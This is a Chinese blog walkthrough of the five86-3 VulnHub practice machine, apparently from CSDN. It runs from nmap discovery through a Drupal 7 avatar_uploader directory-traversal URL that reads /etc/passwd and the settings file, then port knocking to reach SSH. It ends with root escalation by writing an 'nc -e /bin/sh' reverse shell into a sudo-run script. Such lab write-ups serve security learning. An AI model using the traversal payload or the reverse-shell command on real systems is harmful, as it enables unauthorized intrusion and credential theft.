five86-3靶机渗透攻略

最新推荐文章于 2024-04-30 18:01:59 发布
最新推荐文章于 2024-04-30 18:01:59 发布
阅读量1.4k 收藏 5
点赞数 5
分类专栏: vulnhub靶机通关 文章标签: 安全 web安全 渗透测试 网络安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122447029
版权

下载连接:https://www.five86.com/five86-3.html

信息收集

nmap扫描

nmap -sS -sV 192.168.93.0/24
在这里插入图片描述

可知目标ip:192.168.93.133 只开放80

网站信息收集

cms为drupal7
在这里插入图片描述

drupal目录穿越漏洞利用

使用msf发现失败,利用方式不同与DC1
搜索cms漏洞利用方式
https://www.exploit-db.com

在这里插入图片描述
在这里插入图片描述

EXP为:http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

在这里插入图片描述

发现可登录 的用户为:steve、jan、sam、root

查看drupal7配置文件
/var/www/html/sites/default/settings.php
在这里插入图片描述

在这里插入图片描述

发现密码x4lB0XxX

现在知道用户:steve、jan、sam、root 密码:x4lB0XxX。但是没有登陆方式

ssh敲门

/etc/knockd.conf
在这里插入图片描述

需要15s内依次敲3个端口5004,4284,6872

knock -d 200 192.168.93.133 5004 4284 6872
在这里插入图片描述

在这里插入图片描述

端口看房状态维持60s,过后需要再敲
刚才几个用户只有sam能登上
在这里插入图片描述

提权

sudo -l
发现可执行root身份 /opt/scripts/restart-web.sh

在这里插入图片描述

发现sam对脚本有写权限
在这里插入图片描述

更改脚本
vi /opt/scripts/restart-web.sh
写入
nc -e /bin/sh 192.168.93.130 9999

在这里插入图片描述

kali监听端口
nc -lvvp 9999

执行脚本
在这里插入图片描述

提权成功,拿到flag!!
在这里插入图片描述

Forest深林
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
渗透five86-3
Ays.Ie的博客
03-03 509
本篇文章为five86的第3个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1142
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
Drupal远程代码执行(CVE-2019-6341)
weixin_46411728的博客
08-25 744
Drupal XSS漏洞(CVE-2019-6341)
渗透测试学习之靶机Five86-1
情感博主V
03-21 535
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.147 2个http端口,80是Apache,10000那个查一下: web站点相关服务信息 80Apache下的站点: 10000端口下的集成环境: 服务信息看不出啥 ...
渗透测试学习之靶机Five86-2
情感博主V
03-22 604
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.148 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.148 web站点相关服务信息 css加载不出来,奇怪… 目录信息 使用dirb,看一下有无敏感文件: dirb http://192.168.246.148 试图访问ht...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机Five86-2详细解析
合天网安学院
01-21 583
喜欢就关注我吧,订阅更多最新消息VulnHub渗透测试实战靶场Jarbas 1.0https://www.hetianlab.com/expc.do?ec=ECIDfe8c-5c48-4...
five86-2靶机渗透攻略
weixin_47311099的博客
01-11 725
下载地址:https://www.five86.com/five86-2.html 需要修改hosts文件 添加five86-2的解析 ​ 信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 ​ 192.168.93.132开放21ftp 80http ​ 网站信息收集 访问80端口 ​ 发现cms为wordpress5.1.4,未发现有效利用漏洞 使用wpscan进行扫描 wpscan --url [http://five86-2](http://five86-2)
记一次vulnhub|渗透测试Five86-2
crispr的博客
01-29 1368
Five86-2 0X01 Main Point 1.wpscan的使用 2.tcpdump的抓包以及流量分析 3.wordpress插件提权 0X02 前期嗅探和端口探测 arp-scan -l得到靶机IP: nmap -sS -A -p- 172.20.10.3扫描靶机IP的端口开放情况: ftp无法匿名登录,只能从80端口入手: wordpress框架;显示不清楚; 在/et...
Five86-3靶机渗透记录
Jach1n
01-31 130
Five86-3靶机渗透记录
DC6-靶机渗透
banacyo14206的博客
08-22 540
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC-3 靶机
weixin_63492470的博客
03-11 5356
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 439
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 539
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
Linux服务器安全基础 - 查看入侵痕迹
最新发布
eagle89的专栏
04-30 508
Linux服务器安全基础 - 查看入侵痕迹
Five-fold cross-validation
08-29
Five-fold cross-validation是一种验证方法,在模型选择时用来评估不同模型的性能。它将数据集分成五个相等大小的子集,然后轮流将其中四个子集作为训练集,剩下一个子集作为验证集。这个过程重复五次,每次选择不同的验证集。最后,将五次的验证结果取平均值作为模型的评估指标。这种方法可以帮助我们选择在特定数据集上表现最好的模型。通过比较不同模型的平均结果,我们可以选择出最优的模型。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [机器学习_K折交叉验证知识详解(深刻理解版)(全网最详细)](https://blog.csdn.net/Rocky6688/article/details/107296546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值